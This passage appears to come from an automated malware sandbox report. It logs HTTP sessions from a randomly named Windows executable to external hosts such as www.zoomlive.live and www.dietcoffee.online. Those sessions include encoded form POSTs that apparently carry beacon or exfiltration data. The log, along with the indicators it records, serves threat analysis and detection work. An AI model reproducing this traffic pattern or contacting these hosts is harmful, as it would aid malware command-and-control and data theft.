                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 4d 4b 62 75 31 48 4c 46 45 37 69 35 39 43 42 57 4d 73 74 73 78 42 49 75 51 47 63 45 50 61 65 58 64 37 75 64 6f 33 5a 2f 53 72 6e 6d 2f 34 53 51 39 79 39 6f 70 41 46 4f 62 48 7a 57 33 73 67 68 73 58 79 51 54 51 37 77 62 34 4c 34 56 72 38 39 6e 76 30 55 47 56 74 49 4e 53 4a 4a 48 65 63 49 4d 4b 4b 6c 6f 2b 32 34 73 72 72 56 6f 36 58 36 52 6b 52 2f 4b 57 58 4c 30 4e 6b 2f 79 4d 52 7a 45 49 4c 43 54 49 55 61 6d 4c 71 71 79 2b 64 57 37 55 71 67 6d 46 6b 77 34 42 43 35 69 4f 74 48 50 42 75 4e 49 72 61 61 59 31 5a 6e 49 2f 76 73 58 39 53 4f 6b 67 6b 30 4b 32 32 6c 54 53 78 69 67 43 37 65 43 44 43 45 47 45 51 41 68 79 57 70 68 4f 5a 5a 57 45 46 66 6d 4e 74 6d 44 70 7a 7a 54 53 6f 71 63 46 4a 50 48 68 39 6f 6d 44 79 43 6b 42 4f 4b 6c 34 72 34 51 38 6f 56 48 44 70 41 6d 70 67 66 77 57 54 58 2b 6f 6d 7a 46 41 69 38 4f 6c 43 75 44 63 68 44 37 2b 30 4f 57 50 71 75 54 69 2f 39 45 52 68 37 50 61 79 44 55 4a 4d 67 44 46 71 55 4b 64 32 55 54 42 57 45 2f 62 75 76 76 35 35 42 42 6b 6d 6d 2f 2f [TRUNCATED]
                                                                    Data Ascii: bJMLqbS=MKbu1HLFE7i59CBWMstsxBIuQGcEPaeXd7udo3Z/Srnm/4SQ9y9opAFObHzW3sghsXyQTQ7wb4L4Vr89nv0UGVtINSJJHecIMKKlo+24srrVo6X6RkR/KWXL0Nk/yMRzEILCTIUamLqqy+dW7UqgmFkw4BC5iOtHPBuNIraaY1ZnI/vsX9SOkgk0K22lTSxigC7eCDCEGEQAhyWphOZZWEFfmNtmDpzzTSoqcFJPHh9omDyCkBOKl4r4Q8oVHDpAmpgfwWTX+omzFAi8OlCuDchD7+0OWPquTi/9ERh7PayDUJMgDFqUKd2UTBWE/buvv55BBkmm//KMysAI21AAcqfrtzKUBxbyFCXImwtdbfWZfGWGMNrIgfR10C+HTrIgcAYiFvPgIs9qSwXehdGK/y0Kr84uMwGiH/qOAcPwWibe5yNrRNWtzY7oLVQMKTM7mfCoC8bYQWm8Y+cdUeSFT71/ujwJJB6qav5Hip/rxq96vWE+qjRfn/urPj37U7KJit31rAkTHExLQy0DTVeF+EK5JSJdq981PBv1LgMhU1pNYVirxyu1KwqoV4hZwoEwKvbd6OekZGAcItN+UYwyMjNzHzKG4zEpxI5oKO81ZRZ71p4koXHiDahMTu641sbLGgn5Q7wjl8VIdqR78VvAuKzAoXnjb/aitXZgu1Iz49EFYWx36Ym7kG4OdoY5VcUJ9SAJEVOJS80oeuZWsRG77Yi2ntx1+Fm63+JKApMS7tCTQU3OSKirL1nwzLw92CTac2Rew7SY1weqwuqFqmaCMPiiUYxllKG8OuDPF9OTUqx4+6/LDSLJNRnWm9Dm6SzAChBC7B8XQjUFLE7ke4HoRp+ifPWpVNlth3DxIlmdZASn5FG9dPxpm5HuFeGfqzddQhrvyW2SYqUd/9hJVYhAnhyX003lTFRQfWBKe65hUJfwB9jtm72S5Dcslr/GZd7ahgn0GY42R5s8f/y3IWPmYquJy09U+2wOxglAekLlTD+V [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.66423684.32.84.32802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:19.452558994 CET494OUTGET /vc3u/?bJMLqbS=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.123hellodrive.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:32:19.896372080 CET1236INHTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:32:19 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 9973
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Server: hcdn
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: 9c700232e54c7b1875af547ba2ac1eab-bos-edge4
                                                                    Expires: Fri, 10 Jan 2025 20:32:18 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                    Jan 10, 2025 21:32:19.896397114 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                    Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                    Jan 10, 2025 21:32:19.896409988 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                    Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                    Jan 10, 2025 21:32:19.896421909 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                    Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                    Jan 10, 2025 21:32:19.896437883 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                    Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                    Jan 10, 2025 21:32:19.896450043 CET1236INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                    Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                                    Jan 10, 2025 21:32:19.896478891 CET1236INData Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                                                    Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                                                    Jan 10, 2025 21:32:19.896492958 CET1236INData Raw: 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e
                                                                    Data Ascii: p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.
                                                                    Jan 10, 2025 21:32:19.896514893 CET424INData Raw: 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78
                                                                    Data Ascii: .split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?puny


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.664237154.208.202.225802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:25.597104073 CET747OUTPOST /k6vm/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.zoomlive.live
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.zoomlive.live
                                                                    Referer: http://www.zoomlive.live/k6vm/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 4e 53 74 55 63 79 33 51 64 43 6e 41 54 72 37 59 64 62 6a 79 79 53 6a 41 67 79 78 61 6d 6b 76 51 64 57 78 44 2b 56 77 6f 50 4c 54 63 75 67 6c 50 30 7a 57 38 32 74 46 73 6a 2b 30 4a 4d 6e 7a 52 56 4c 43 62 38 6d 50 43 4c 48 69 53 7a 66 47 61 76 62 6f 64 69 56 65 79 6c 51 2f 39 41 2f 50 39 52 31 32 56 38 49 77 61 79 43 53 6e 34 39 6a 50 61 4f 30 36 4c 4f 79 53 44 49 72 59 68 6b 77 46 37 72 54 78 4f 63 4f 79 65 43 67 62 6b 2f 42 31 77 38 7a 6b 35 47 5a 44 31 35 71 74 47 4c 39 75 42 4d 36 58 41 53 4b 67 64 39 58 4a 68 4d 2b 49 64 63 73 36 41 54 47 6e 67 6e 46 6a 62 62 39 78 36 47 68 6c 4e 54 45 4c 4e 65 76 4f
                                                                    Data Ascii: bJMLqbS=NStUcy3QdCnATr7YdbjyySjAgyxamkvQdWxD+VwoPLTcuglP0zW82tFsj+0JMnzRVLCb8mPCLHiSzfGavbodiVeylQ/9A/P9R12V8IwayCSn49jPaO06LOySDIrYhkwF7rTxOcOyeCgbk/B1w8zk5GZD15qtGL9uBM6XASKgd9XJhM+Idcs6ATGngnFjbb9x6GhlNTELNevO
                                                                    Jan 10, 2025 21:32:26.518134117 CET190INHTTP/1.1 400 Bad Request
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:36:54 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: d404 Not Found0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.664238154.208.202.225802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:28.141944885 CET771OUTPOST /k6vm/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.zoomlive.live
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.zoomlive.live
                                                                    Referer: http://www.zoomlive.live/k6vm/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 4e 53 74 55 63 79 33 51 64 43 6e 41 53 49 6a 59 51 63 2f 79 6e 43 6a 48 38 69 78 61 39 30 75 5a 64 57 39 44 2b 52 6f 34 50 2f 2f 63 75 43 39 50 36 53 57 38 31 74 46 73 6f 65 30 4d 52 58 7a 65 56 4c 50 75 38 6a 50 43 4c 48 6d 53 7a 61 36 61 73 73 45 65 6a 46 65 77 74 77 2f 37 45 2f 50 39 52 31 32 56 38 4a 55 30 79 43 61 6e 34 50 33 50 61 74 73 35 55 2b 79 54 4b 6f 72 59 32 55 77 42 37 72 54 44 4f 64 69 55 65 41 49 62 6b 39 5a 31 7a 70 48 6a 77 47 5a 42 37 5a 72 6f 49 65 45 65 48 73 54 50 49 43 69 34 4b 2f 6a 76 6b 36 6a 53 42 76 73 5a 53 44 6d 6c 67 6c 64 52 62 37 39 62 34 47 5a 6c 66 45 49 73 43 71 4b 74 42 52 35 53 4c 59 63 4f 74 37 76 54 64 42 65 54 76 6d 41 6f 48 51 3d 3d
                                                                    Data Ascii: bJMLqbS=NStUcy3QdCnASIjYQc/ynCjH8ixa90uZdW9D+Ro4P//cuC9P6SW81tFsoe0MRXzeVLPu8jPCLHmSza6assEejFewtw/7E/P9R12V8JU0yCan4P3Pats5U+yTKorY2UwB7rTDOdiUeAIbk9Z1zpHjwGZB7ZroIeEeHsTPICi4K/jvk6jSBvsZSDmlgldRb79b4GZlfEIsCqKtBR5SLYcOt7vTdBeTvmAoHQ==
                                                                    Jan 10, 2025 21:32:29.087755919 CET190INHTTP/1.1 400 Bad Request
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:36:56 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: d404 Not Found0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.664239154.208.202.225802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:30.691261053 CET1784OUTPOST /k6vm/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.zoomlive.live
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.zoomlive.live
                                                                    Referer: http://www.zoomlive.live/k6vm/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 4e 53 74 55 63 79 33 51 64 43 6e 41 53 49 6a 59 51 63 2f 79 6e 43 6a 48 38 69 78 61 39 30 75 5a 64 57 39 44 2b 52 6f 34 50 2b 72 63 76 78 31 50 36 78 2b 38 30 74 46 73 72 65 30 4e 52 58 7a 35 56 4c 58 71 38 6a 79 35 4c 46 4f 53 79 34 43 61 74 59 51 65 6f 46 65 77 76 77 2f 36 41 2f 50 53 52 31 47 5a 38 49 6b 30 79 43 61 6e 34 50 62 50 59 2b 30 35 57 2b 79 53 44 49 72 45 68 6b 78 63 37 72 4c 54 4f 64 6d 69 65 77 6f 62 6c 64 4a 31 31 62 66 6a 78 6d 5a 48 32 35 72 4f 49 65 41 42 48 71 33 44 49 43 6d 47 4b 2f 48 76 6b 2f 36 58 52 37 63 30 4d 7a 4c 47 78 58 56 4c 43 73 52 65 67 51 5a 31 57 58 73 32 61 6f 53 48 4b 42 4e 56 4a 5a 78 65 68 49 50 75 55 58 37 74 36 57 52 6d 64 79 59 38 50 35 41 4c 67 32 54 31 64 59 71 2b 75 36 34 33 6e 59 7a 64 7a 73 2f 5a 6b 56 77 47 56 39 47 78 54 59 55 76 78 48 51 38 42 39 4a 30 48 61 52 45 49 30 61 38 30 59 55 68 50 73 32 72 6c 35 67 44 6f 35 66 4d 49 5a 74 43 6e 62 30 2b 74 37 39 66 54 71 37 50 48 76 46 75 51 61 49 42 4a 38 4f 65 41 68 42 42 4b 31 [TRUNCATED]
                                                                    Data Ascii: bJMLqbS=NStUcy3QdCnASIjYQc/ynCjH8ixa90uZdW9D+Ro4P+rcvx1P6x+80tFsre0NRXz5VLXq8jy5LFOSy4CatYQeoFewvw/6A/PSR1GZ8Ik0yCan4PbPY+05W+ySDIrEhkxc7rLTOdmiewobldJ11bfjxmZH25rOIeABHq3DICmGK/Hvk/6XR7c0MzLGxXVLCsRegQZ1WXs2aoSHKBNVJZxehIPuUX7t6WRmdyY8P5ALg2T1dYq+u643nYzdzs/ZkVwGV9GxTYUvxHQ8B9J0HaREI0a80YUhPs2rl5gDo5fMIZtCnb0+t79fTq7PHvFuQaIBJ8OeAhBBK1laOmKsiGAV7jNqtiFALKex5D3tAajAyESb78cHbJC8417Z+06e4pUJC0krtFtGPxbbbRDwNuFK1G0GjoLxU1q50qtDQqOfFwM4mzSO3IMOR9siCl1BTOB3CNzUdf3eR8XimHP7ubpjmyw8cDcXr0H87pSi+2jsZsgJugLDIes9EimfLoO61B7lPVgJlNHLcjEZ5rgRgrmXAlko3vngDYQRkz6OLhZeEbUPnZgC+PmeAj1hL1q3MRNYcsvIOrP2TDJNkZEk9MnVgiby39mhtvT46y0ML4jdDpXua26fzPjLW5/aMLxoN7N1LiWSL4TZSkchF4SB3z/Czv6ewWmBBjjdTAcx8wk1zM7EDGYwbtdypo6jwpm0rLkaimfCYOKT4+lcNFuMajLgk2UoCDgq8v2PZIrktmwI+mC2+IZqK0EzV5DVKGMdyc6j4XwmjU70PuZP6OF0EmbqefYOmCgmfJHtRTyYjeN+9162bvu1a41Gl8jrkP2wIos7IUc2NcXNa1bl74+nQdNpwQoSqzLK+oJ0oCTCHo0BvB/dJjS5Qga43D5LtkG86BEM3V3KhZUFCUrJpXei2oogRc/fN16yQNtTbAcjCUGyNYCa/Mtv2kJ757hDbfNdFkxKtwMOsLxj6oc+Vw6UQWegqMxsADFi2shroPrFB/C4wzbC [TRUNCATED]
                                                                    Jan 10, 2025 21:32:31.638020039 CET190INHTTP/1.1 400 Bad Request
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:36:59 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: d404 Not Found0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.664240154.208.202.225802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:33.229238033 CET489OUTGET /k6vm/?xHrti=IpSlbxE0jR&bJMLqbS=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEnvFfogATAKvfKf2eq3ZcSrhy/qdqLc/JYZ8TgWJuF+1kS7eDlOqY= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.zoomlive.live
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:32:34.634125948 CET180INHTTP/1.1 503 Service Unavailable
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:37:02 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.66424177.68.64.45802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:39.704314947 CET759OUTPOST /725g/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.dietcoffee.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.dietcoffee.online
                                                                    Referer: http://www.dietcoffee.online/725g/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 6a 67 6f 2b 6e 6d 52 54 6e 74 56 4e 48 50 41 71 7a 4b 4c 68 43 58 50 42 59 75 67 43 56 62 46 42 42 68 6c 65 32 76 4b 63 38 77 45 57 66 35 62 50 61 76 61 34 71 79 41 4d 57 6f 65 75 73 78 4a 6f 7a 6b 65 78 6d 79 6c 6b 49 4f 43 59 50 32 31 30 6d 56 58 41 6d 30 49 79 6e 39 79 74 71 30 34 55 6c 33 62 6c 2f 37 30 2b 75 79 4f 4b 32 59 4e 7a 4a 31 46 45 6d 77 36 77 32 52 31 79 68 4d 31 62 59 54 68 47 6f 31 52 78 57 71 5a 68 4e 37 56 41 75 57 46 71 74 6b 59 4c 79 6c 68 66 58 72 41 53 5a 68 5a 4c 35 49 6b 6b 30 5a 50 65 4b 74 33 35 41 64 6c 57 75 47 53 61 64 5a 56 6a 6b 4a 58 38 4d 47 69 78 77 72 78 7a 43 4b 6f 4b
                                                                    Data Ascii: bJMLqbS=jgo+nmRTntVNHPAqzKLhCXPBYugCVbFBBhle2vKc8wEWf5bPava4qyAMWoeusxJozkexmylkIOCYP210mVXAm0Iyn9ytq04Ul3bl/70+uyOK2YNzJ1FEmw6w2R1yhM1bYThGo1RxWqZhN7VAuWFqtkYLylhfXrASZhZL5Ikk0ZPeKt35AdlWuGSadZVjkJX8MGixwrxzCKoK
                                                                    Jan 10, 2025 21:32:40.316082954 CET393INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.25.3
                                                                    Date: Fri, 10 Jan 2025 20:32:41 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
